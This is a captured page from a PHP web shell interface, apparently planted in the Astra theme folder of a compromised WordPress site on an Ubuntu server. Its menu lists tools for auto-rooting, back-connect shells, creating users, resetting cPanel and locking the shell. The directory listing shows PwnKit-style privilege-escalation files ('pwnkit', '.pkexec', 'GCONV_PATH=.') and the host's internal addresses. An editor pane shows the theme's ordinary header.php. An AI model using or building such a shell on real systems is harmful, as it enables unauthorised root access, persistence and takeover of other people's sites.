Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
wp-content /
themes /
astra /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
template-parts
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
404.php
685
B
-rwxrwxr-x
SECURITY.md
1.59
KB
-rwxrwxr-x
archive.php
727
B
-rwxrwxr-x
changelog.txt
149.52
KB
-rwxrwxr-x
comments.php
4.5
KB
-rwxrwxr-x
footer.php
605
B
-rwxrwxr-x
functions.php
8.64
KB
-rwxrwxr-x
header.php
1.46
KB
-rwxrwxr-x
index.php
904
B
-rwxrwxr-x
page.php
866
B
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
6.78
KB
-rwxrwxr-x
screenshot.jpg
357.85
KB
-rwxrwxr-x
search.php
769
B
-rwxrwxr-x
searchform.php
2.08
KB
-rwxrwxr-x
sidebar.php
1000
B
-rwxrwxr-x
single.php
693
B
-rwxrwxr-x
style.css
4.47
KB
-rwxrwxr-x
theme.json
2.35
KB
-rwxrwxr-x
toolset-config.json
7.46
KB
-rwxrwxr-x
wpml-config.xml
5.11
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for Astra Theme. * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } ?><!DOCTYPE html> <?php astra_html_before(); ?> <html <?php language_attributes(); ?>> <head> <?php astra_head_top(); ?> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php if ( apply_filters( 'astra_header_profile_gmpg_link', true ) ) { ?> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php } ?> <?php wp_head(); ?> <?php astra_head_bottom(); ?> </head> <body <?php astra_schema_body(); ?> <?php body_class(); ?>> <?php astra_body_top(); ?> <?php wp_body_open(); ?> <a class="skip-link screen-reader-text" href="#content" title="<?php echo esc_attr( astra_default_strings( 'string-header-skip-link', false ) ); ?>"> <?php echo esc_html( astra_default_strings( 'string-header-skip-link', false ) ); ?> </a> <div <?php echo wp_kses_post( astra_attr( 'site', array( 'id' => 'page', 'class' => 'hfeed site', ) ) ); ?> > <?php astra_header_before(); astra_header(); astra_header_after(); astra_content_before(); ?> <div id="content" class="site-content"> <div class="ast-container"> <?php astra_content_top(); ?>
Close